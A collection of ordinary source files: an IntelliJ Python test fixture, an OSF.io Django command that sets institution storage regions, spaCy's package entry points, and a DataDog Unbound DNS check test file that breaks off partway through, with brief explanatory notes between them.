gha_event_created_at: 2023-09-12T07:41:58 | gha_created_at: 2011-09-30T13:33:05 | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
The `<caret>` marker is IntelliJ test-fixture syntax for the expected editor caret position, not Python source:

```python
from typing import Callable, Any


def func() -> Callable[[Any], int]:
    return lambda x: 42<caret>
```
---
repo_name: CenterForOpenScience/osf.io | branch_name: refs/heads/develop | path: /osf/management/commands/set_institution_storage_regions.py | filename: set_institution_storage_regions.py | extension: py | length_bytes: 4,375
blob_id: f4ac25e36d88644e3a920f6b0a0ee6b4a7fc1d60 | directory_id: 3c41443364da8b44c74dce08ef94a1acd1b66b3e | content_id: ae5c7ac60d4c11e0d4cb2c826acfd310d58a70bd
snapshot_id: 71d9540be7989f7118a33e15bc4a6ce2d2492ac1 | revision_id: a3e0a0b9ddda5dd75fc8248d58f3bcdeece0323e
detected_licenses: ["MIT", "BSD-3-Clause", "LicenseRef-scancode-free-unknown", "LicenseRef-scancode-warranty-disclaimer", "AGPL-3.0-only", "LGPL-2.0-or-later", "LicenseRef-scancode-proprietary-license", "MPL-1.1", "CPAL-1.0", "LicenseRef-scancode-unknown-license-reference", "BSD-2-Clause", "Apache-2.0"] | license_type: permissive | gha_license_id: Apache-2.0
visit_date: 2023-09-04T03:21:14.970917 | revision_date: 2023-08-31T14:49:20 | committer_date: 2023-08-31T14:49:20
github_id: 10,199,599 | star_events_count: 683 | fork_events_count: 390
gha_event_created_at: 2023-09-14T17:07:52 | gha_created_at: 2013-05-21T15:53:37 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
```python
import logging

from django.core.management.base import BaseCommand
from django.db import transaction

from osf.models import Institution, InstitutionStorageRegion
from addons.osfstorage.models import Region

logger = logging.getLogger(__name__)


class Command(BaseCommand):
    """Set storage regions for institutions.
    """

    def add_arguments(self, parser):
        super(Command, self).add_arguments(parser)
        parser.add_argument(
            '-d',
            '--dry',
            action='store_true',
            dest='dry_run',
            help='If true, check institution and region only'
        )
        parser.add_argument(
            '-i',
            '--institution',
            type=str,
            required=True,
            help='Select the institution to add the storage region to'
        )
        parser.add_argument(
            '-r',
            '--region',
            type=str,
            required=True,
            help='Select the storage region to be added to the institution'
        )
        parser.add_argument(
            '-p',
            '--preferred',
            action='store_true',
            dest='is_preferred',
            help='Set the storage region as the preferred choice for the institution'
        )

    def handle(self, *args, **options):
        dry_run = options.get('dry_run', False)
        if dry_run:
            logger.warning('Dry Run: This is a dry-run pass!')
        institution_id = options['institution']
        region_id = options['region']
        is_preferred = options.get('is_preferred', False)
        with transaction.atomic():
            set_institution_storage_regions(institution_id, region_id, is_preferred=is_preferred)
            if dry_run:
                raise RuntimeError('Dry run -- transaction rolled back')


def set_institution_storage_regions(institution_id, region_id, is_preferred=False):
    # Verify institution and region
    try:
        institution = Institution.objects.get(_id=institution_id)
        region = Region.objects.get(_id=region_id)
    except (Institution.DoesNotExist, Region.DoesNotExist) as e:
        logger.error(f'Institution and/or Region not found: error={e}')
        return
    # Get or set region for institution
    if region in institution.storage_regions.all():
        logger.warning(f'Region [{region._id}] already set for Institution [{institution._id}]')
        institution_storage_region = InstitutionStorageRegion.objects.get(
            institution=institution,
            storage_region=region
        )
        if institution_storage_region.is_preferred:
            logger.warning(f'Region [{region._id}] already set as preferred for Institution [{institution._id}]')
            return
    else:
        institution_storage_region = InstitutionStorageRegion.objects.create(
            institution=institution,
            storage_region=region
        )
        logger.info(f'Region [{region._id}] has been added to Institution [{institution._id}]')
    # Make sure there is only one preferred region
    try:
        existing_preferred_institution_storage_region = InstitutionStorageRegion.objects.get(
            institution=institution,
            is_preferred=True,
        )
    # Case 1: always set the region as preferred if there is no preferred region for the institution;
    # this executes even if the option `-p` / `--preferred` is not provided
    except InstitutionStorageRegion.DoesNotExist:
        institution_storage_region.is_preferred = True
        institution_storage_region.save()
        logger.info(f'Region [{region._id}] has been set as preferred choice for Institution [{institution._id}]')
        return
    # Case 2: do nothing and return if preferred region exists and if `is_preferred` is not set
    if not is_preferred:
        return
    # Case 3: if `is_preferred` is set, clear the existing preferred region before setting the new one
    existing_preferred_institution_storage_region.is_preferred = False
    existing_preferred_institution_storage_region.save()
    logger.info(f'The old preferred region has been removed from Institution [{institution._id}]')
    institution_storage_region.is_preferred = True
    institution_storage_region.save()
    logger.info(f'Region [{region._id}] has been set as the preferred choice for Institution [{institution._id}]')
```
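A sketch of invoking the command from a Django shell, assuming OSF's settings are configured; the institution and region ids are made-up placeholders, and call_command passes options by their dest names:

```python
# Hypothetical invocation; "cos" and "us-east-1" are placeholder ids.
from django.core.management import call_command

call_command(
    "set_institution_storage_regions",
    institution="cos",     # -i / --institution
    region="us-east-1",    # -r / --region
    is_preferred=True,     # -p / --preferred
    dry_run=True,          # -d / --dry: verify, then roll the transaction back
)
```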
---
repo_name: ryfeus/lambda-packs | branch_name: refs/heads/master | path: /Spacy/source2.7/spacy/__init__.py | filename: __init__.py | extension: py | length_bytes: 630
blob_id: 5770908757d93caa0d790965356943b644053e69 | directory_id: fbbe424559f64e9a94116a07eaaa555a01b0a7bb | content_id: bda109086db1d12e39bcc9949897dd54d1f361f4
snapshot_id: 6544adb4dec19b8e71d75c24d8ed789b785b0369 | revision_id: cabf6e4f1970dc14302f87414f170de19944bac2
detected_licenses: ["MIT"] | license_type: permissive | gha_license_id: MIT
visit_date: 2022-12-07T16:18:52.475504 | revision_date: 2022-11-29T13:35:35 | committer_date: 2022-11-29T13:35:35
github_id: 71,386,735 | star_events_count: 1,283 | fork_events_count: 263
gha_event_created_at: 2022-11-26T05:02:14 | gha_created_at: 2016-10-19T18:22:39 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
```python
# coding: utf8
from __future__ import unicode_literals

from .cli.info import info as cli_info
from .glossary import explain
from .about import __version__
from .errors import Warnings, deprecation_warning
from . import util


def load(name, **overrides):
    depr_path = overrides.get('path')
    if depr_path not in (True, False, None):
        deprecation_warning(Warnings.W001.format(path=depr_path))
    return util.load_model(name, **overrides)


def blank(name, **kwargs):
    LangClass = util.get_lang_class(name)
    return LangClass(**kwargs)


def info(model=None, markdown=False):
    return cli_info(model, markdown)
```
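These are the public entry points of spaCy v2-era releases. A short usage sketch, assuming a spaCy 2.x install; blank builds a bare pipeline, while load additionally requires a downloaded model package (the model name below is an assumption):

```python
# Usage sketch against a spaCy 2.x install.
import spacy

nlp = spacy.blank("en")   # bare Language built via util.get_lang_class
doc = nlp("hello world")
print(len(doc))           # 2

# spacy.load("en_core_web_sm") would go through util.load_model; it needs
# that model package installed first (hypothetical here).
```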
---
repo_name: DataDog/integrations-extras | branch_name: refs/heads/master | path: /unbound/tests/test_unbound.py | filename: test_unbound.py | extension: py | length_bytes: 58,545
blob_id: e0c6fc2119cb835291bcc8e61ad7ad67770f1198 | directory_id: 97e557d328b89adbd1459f8988a12ec3a9f4adc7 | content_id: 330b06cd8818e250a7723c42b1f9eec7e04f5587
snapshot_id: 1b9c9928af4e5a146b9611aed29db206f420710c | revision_id: 1d20f8d945ef802fa6e01b41b6ba99148ac508a4
detected_licenses: [] | license_type: permissive | gha_license_id: BSD-3-Clause
visit_date: 2023-08-31T04:01:33.555722 | revision_date: 2023-08-30T18:51:09 | committer_date: 2023-08-30T18:51:09
github_id: 51,574,196 | star_events_count: 221 | fork_events_count: 667
gha_event_created_at: 2023-09-14T16:07:56 | gha_created_at: 2016-02-12T07:55:28 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content (the dump cuts off mid-file):
```python
import os

import mock
import pytest

from datadog_checks.base import AgentCheck, ConfigurationError
from datadog_checks.unbound import UnboundCheck


def test_nonexistent_unbound_control():
    check = UnboundCheck('unbound', {}, {})
    with mock.patch('datadog_checks.unbound.unbound.which', return_value=None):
        with pytest.raises(ConfigurationError, match='executable not found: .*'):
            check.check({})


def test_no_sudo(mock_which):
    check = UnboundCheck('unbound', {}, {})
    with mock.patch('datadog_checks.unbound.unbound.os.system', return_value=1):
        with pytest.raises(Exception, match='.* does not have sudo access'):
            check.check({'use_sudo': True})


def test_unbound_on_root_path_but_not_current_users_path(aggregator, env_setup):
    check = UnboundCheck('unbound', {}, {})

    # Simulate success with the setsid sudo check, and output from unbound-control. This
    # test focuses on sudo which can work even when setsid sudo doesn't.
    #
    # Unfortunately on some systems sudo may require entering a password...
    with mock.patch('datadog_checks.unbound.unbound.os.system', return_value=0):
        with mock.patch('datadog_checks.unbound.UnboundCheck.call_unbound_control', return_value='foo=0'):
            # env_setup removes paths with sbin from the PATH for the current user, so use
            # a program in e.g. /sbin for sudo. Note that unbound-control is not
            # necessarily (and probably not) installed in the test environment, so use
            # something that is.
            sudo_only_executable = '/sbin/ifconfig'
            assert os.path.isfile(sudo_only_executable)
            check.check({'use_sudo': True, 'unbound_control': sudo_only_executable})

    # Ignore the actual metrics...Consider the test successful if we see an ok service
    # check
    aggregator.assert_service_check(UnboundCheck.SERVICE_CHECK_NAME, status=AgentCheck.OK)


def test_nonexistent_unbound_control_with_sudo(aggregator):
    check = UnboundCheck('unbound', {}, {})

    # Choose an unbound_control executable that doesn't exist under sudo.
    non_existent_executable = '/this/does/not/exist'

    # This makes sure it doesn't exist at all, which is stronger, but helps home in on
    # errors in the test vs. errors in the code.
    assert not os.path.isfile(non_existent_executable)

    # Simulate success with the setsid sudo check. This test focuses on sudo which can
    # work even when setsid sudo doesn't.
    #
    # Unfortunately on some systems sudo may require entering a password...
    with mock.patch('datadog_checks.unbound.unbound.os.system', return_value=0):
        with pytest.raises(ConfigurationError, match='executable not found: .*'):
            check.check({'use_sudo': True, 'unbound_control': non_existent_executable})


def test_unbound_control_exception(aggregator, mock_which):
    check = UnboundCheck('unbound', {}, {})
    with mock.patch('datadog_checks.unbound.unbound.get_subprocess_output') as mock_unbound:
        message = 'arbitrary exception'
        mock_unbound.side_effect = Exception(message)
        with pytest.raises(Exception, match='Unable to get unbound stats: {}'.format(message)):
            check.check({})
    aggregator.assert_service_check(UnboundCheck.SERVICE_CHECK_NAME, status=AgentCheck.CRITICAL)


def test_unbound_control_non_zero_return_code(aggregator, mock_which):
    check = UnboundCheck('unbound', {}, {})
    return_code = 1
    with mock.patch('datadog_checks.unbound.unbound.get_subprocess_output', return_value=('', '', return_code)):
        with pytest.raises(Exception, match='failed, return code: {}'.format(return_code)):
            check.check({})
    aggregator.assert_service_check(UnboundCheck.SERVICE_CHECK_NAME, status=AgentCheck.CRITICAL)


def test_unbound_control_empty_output(aggregator, mock_which):
    check = UnboundCheck('unbound', {}, {})
    with mock.patch('datadog_checks.unbound.unbound.get_subprocess_output', return_value=('', '', 0)):
        with pytest.raises(Exception, match='no output from .*'):
            check.check({})
    aggregator.assert_service_check(UnboundCheck.SERVICE_CHECK_NAME, status=AgentCheck.CRITICAL)


def test_wacky_output(aggregator, mock_which):
    check = UnboundCheck('unbound', {}, {})
    output = 'foo'
    with mock.patch('datadog_checks.unbound.unbound.get_subprocess_output', return_value=(output, '', 0)):
        with pytest.raises(Exception, match="unable to parse output '{}'".format(output)):
            check.check({})
    aggregator.assert_service_check(UnboundCheck.SERVICE_CHECK_NAME, status=AgentCheck.CRITICAL)


def test_basic_stats_1_4_22(aggregator, mock_which, mock_basic_stats_1_4_22):
    check = UnboundCheck('unbound', {}, {})
    tags = ['foo:bar']
    check.check({'tags': tags})
    aggregator.assert_service_check(UnboundCheck.SERVICE_CHECK_NAME, status=AgentCheck.OK)
    assert_basic_stats_1_4_22(aggregator, tags)
    aggregator.assert_all_metrics_covered()


def test_basic_stats_1_9_2(aggregator, mock_which, mock_basic_stats_1_9_2):
    check = UnboundCheck('unbound', {}, {})
    tags = ['foo:bar']
    check.check({'tags': tags})
    aggregator.assert_service_check(UnboundCheck.SERVICE_CHECK_NAME, status=AgentCheck.OK)
    assert_basic_stats_1_9_2(aggregator, tags)
    aggregator.assert_all_metrics_covered()


def test_multithread_stats(aggregator, mock_which, mock_multithread_stats):
    check = UnboundCheck('unbound', {}, {})
    tags = ['foo:bar']
    check.check({'tags': tags})
    aggregator.assert_service_check(UnboundCheck.SERVICE_CHECK_NAME, status=AgentCheck.OK)
    assert_multithread_stats(aggregator, tags)
    aggregator.assert_all_metrics_covered()


def test_extended_stats_1_4_22(aggregator, mock_which, mock_extended_stats_1_4_22):
    check = UnboundCheck('unbound', {}, {})
    tags = ['foo:bar']
    check.check({'tags': tags})
    aggregator.assert_service_check(UnboundCheck.SERVICE_CHECK_NAME, status=AgentCheck.OK)
    assert_extended_stats_1_4_22(aggregator, tags)
    aggregator.assert_all_metrics_covered()


def test_extended_stats_1_9_2(aggregator, mock_which, mock_extended_stats_1_9_2):
    check = UnboundCheck('unbound', {}, {})
    tags = ['foo:bar']
    check.check({'tags': tags})
    aggregator.assert_service_check(UnboundCheck.SERVICE_CHECK_NAME, status=AgentCheck.OK)
    assert_extended_stats_1_9_2(aggregator, tags)
    aggregator.assert_all_metrics_covered()


def test_hostname_with_port(aggregator, mock_which, mock_basic_stats_1_4_22):
    instance = {"host": "localhost@53"}
    check = UnboundCheck('unbound', {}, [instance])
    check.check(instance)

    # Ignore the actual metrics...Consider the test successful if we see an ok service
    # check
    aggregator.assert_service_check(UnboundCheck.SERVICE_CHECK_NAME, status=AgentCheck.OK)


def test_hostname_without_port(aggregator, mock_which, mock_basic_stats_1_4_22):
    instance = {"host": "localhost"}
    check = UnboundCheck('unbound', {}, [instance])
    check.check(instance)

    # Ignore the actual metrics...Consider the test successful if we see an ok service
    # check
    aggregator.assert_service_check(UnboundCheck.SERVICE_CHECK_NAME, status=AgentCheck.OK)
```
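Every test above isolates the check from the real unbound-control binary and from sudo by patching at the import site with mock.patch. A standalone sketch of that pattern, runnable without datadog_checks installed:

```python
# Standalone sketch of the patching pattern used above; no Datadog code needed.
import os
from unittest import mock

# Patch os.system the way the sudo tests do, so nothing actually executes.
with mock.patch('os.system', return_value=0) as fake_system:
    assert os.system('sudo -nv setsid true') == 0
    fake_system.assert_called_once_with('sudo -nv setsid true')
```

The remainder of the file is the hand-written assertion helpers those tests call: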
```python
def assert_basic_stats_1_9_2(aggregator, tags):
    thread0_tags = tags + ['thread:0']
    aggregator.assert_metric('unbound.thread.num.queries', value=1, tags=thread0_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.num.queries_ip_ratelimited', value=0, tags=thread0_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.num.cachehits', value=0, tags=thread0_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.num.cachemiss', value=1, tags=thread0_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.num.prefetch', value=0, tags=thread0_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.num.zero_ttl', value=0, tags=thread0_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.num.recursivereplies', value=1, tags=thread0_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.requestlist.avg', value=0, tags=thread0_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.requestlist.max', value=0, tags=thread0_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.requestlist.overwritten', value=0, tags=thread0_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.requestlist.exceeded', value=0, tags=thread0_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.requestlist.current.all', value=0, tags=thread0_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.requestlist.current.user', value=0, tags=thread0_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.recursion.time.avg', value=0.275972, tags=thread0_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.recursion.time.median', value=0, tags=thread0_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.tcpusage', value=0, tags=thread0_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)

    thread1_tags = tags + ['thread:1']
    aggregator.assert_metric('unbound.thread.num.queries', value=1, tags=thread1_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.num.queries_ip_ratelimited', value=0, tags=thread1_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.num.cachehits', value=1, tags=thread1_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.num.cachemiss', value=0, tags=thread1_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.num.prefetch', value=0, tags=thread1_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.num.zero_ttl', value=0, tags=thread1_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.num.recursivereplies', value=0, tags=thread1_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.requestlist.avg', value=0, tags=thread1_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.requestlist.max', value=0, tags=thread1_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.requestlist.overwritten', value=0, tags=thread1_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.requestlist.exceeded', value=0, tags=thread1_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.requestlist.current.all', value=0, tags=thread1_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.requestlist.current.user', value=0, tags=thread1_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.recursion.time.avg', value=0, tags=thread1_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.recursion.time.median', value=0, tags=thread1_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.tcpusage', value=0, tags=thread1_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)

    thread2_tags = tags + ['thread:2']
    aggregator.assert_metric('unbound.thread.num.queries', value=1, tags=thread2_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.num.queries_ip_ratelimited', value=0, tags=thread2_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.num.cachehits', value=1, tags=thread2_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.num.cachemiss', value=0, tags=thread2_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.num.prefetch', value=0, tags=thread2_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.num.zero_ttl', value=0, tags=thread2_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.num.recursivereplies', value=0, tags=thread2_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.requestlist.avg', value=0, tags=thread2_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.requestlist.max', value=0, tags=thread2_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.requestlist.overwritten', value=0, tags=thread2_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.requestlist.exceeded', value=0, tags=thread2_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.requestlist.current.all', value=0, tags=thread2_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.requestlist.current.user', value=0, tags=thread2_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.recursion.time.avg', value=0, tags=thread2_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.recursion.time.median', value=0, tags=thread2_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.tcpusage', value=0, tags=thread2_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)

    aggregator.assert_metric('unbound.total.num.queries', value=3, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.total.num.queries_ip_ratelimited', value=0, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.total.num.cachehits', value=2, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.total.num.cachemiss', value=1, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.total.num.prefetch', value=0, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.total.num.zero_ttl', value=0, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.total.num.recursivereplies', value=1, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.total.requestlist.avg', value=0, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.total.requestlist.max', value=0, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.total.requestlist.overwritten', value=0, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.total.requestlist.exceeded', value=0, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.total.requestlist.current.all', value=0, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.total.requestlist.current.user', value=0, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.total.recursion.time.avg', value=0.275972, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.total.recursion.time.median', value=0, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.total.tcpusage', value=0, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.time.now', value=1561493959.739239, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.time.up', value=18.262188, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.time.elapsed', value=18.262188, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)


def assert_basic_stats_1_4_22(aggregator, tags):
    # Rather than write code to parse stats.basic and wrestle with potential
    # bugs there, let's manually craft the assertions. I don't expect
    # stats.basic to change very often.
    thread_tags = tags + ['thread:0']
    aggregator.assert_metric('unbound.thread.num.queries', value=178275254, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.num.cachehits', value=166270813, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.num.cachemiss', value=12004441, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.num.prefetch', value=0, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.num.recursivereplies', value=12004441, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.requestlist.avg', value=0.395844, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.requestlist.max', value=9, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.requestlist.overwritten', value=0, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.requestlist.exceeded', value=0, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.requestlist.current.all', value=0, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.requestlist.current.user', value=0, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.recursion.time.avg', value=0.010833, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.recursion.time.median', value=0.00169968, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)

    aggregator.assert_metric('unbound.total.num.queries', value=178275254, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.total.num.cachehits', value=166270813, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.total.num.cachemiss', value=12004441, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.total.num.prefetch', value=0, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.total.num.recursivereplies', value=12004441, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.total.requestlist.avg', value=0.395844, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.total.requestlist.max', value=9, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.total.requestlist.overwritten', value=0, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.total.requestlist.exceeded', value=0, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.total.requestlist.current.all', value=0, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.total.requestlist.current.user', value=0, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.total.recursion.time.avg', value=0.010833, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.total.recursion.time.median', value=0.00169968, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.time.now', value=1558048773.969199, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.time.up', value=49144398.166967, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.time.elapsed', value=2082502.474876, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)


def assert_multithread_stats(aggregator, tags):
    thread_tags = tags + ['thread:11']
    aggregator.assert_metric('unbound.thread.num.queries', value=178275254, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.num.cachehits', value=166270813, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.num.cachemiss', value=12004441, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.num.prefetch', value=0, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.num.recursivereplies', value=12004441, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.requestlist.avg', value=0.395844, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.requestlist.max', value=9, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.requestlist.overwritten', value=0, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.requestlist.exceeded', value=0, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.requestlist.current.all', value=0, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.requestlist.current.user', value=0, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.recursion.time.avg', value=0.010833, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.recursion.time.median', value=0.00169968, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)


def assert_extended_stats_1_4_22(aggregator, tags):
    thread_tags = tags + ['thread:0']
